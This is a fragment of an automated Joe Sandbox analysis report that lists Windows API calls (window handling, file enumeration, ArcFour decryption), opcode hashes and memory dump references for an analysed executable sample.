                                                                                                      • API String ID: 2236967946-3182603685
                                                                                                      • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                      • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                      • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                      • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                      • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                      • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                      • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                      • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D0F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 568898626-3772416878
                                                                                                      • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                      • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                      • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                      • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                      • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                      • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                      • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                      • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                      • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                      • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                      • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                      • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1177325624-0
                                                                                                      • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                      • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                      • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                      • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 0048397A
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$IconicLong
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754861897-0
                                                                                                      • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                      • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                      • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                      • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                      • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                      • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                      • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                      • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004241E4
                                                                                                      • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                        • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                        • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                      • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 649377781-0
                                                                                                      • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                      • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                      • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                      • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D0F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 568898626-0
                                                                                                      • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                      • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                      • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                      • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureIconic
                                                                                                      • String ID:
                                                                                                      • API String ID: 2277910766-0
                                                                                                      • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                      • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                      • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                      • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 0042419B
                                                                                                        • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                        • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                        • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                        • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                      • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                        • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2671590913-0
                                                                                                      • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                      • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                      • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                      • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                      • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                      • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                      • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                      • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                      • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                      • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                      • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                      • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                      • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                      APIs
                                                                                                      • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptFour
                                                                                                      • String ID:
                                                                                                      • API String ID: 2153018856-0
                                                                                                      • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                      • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                      • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                      • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2631587981.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2631554206.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2634215060.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
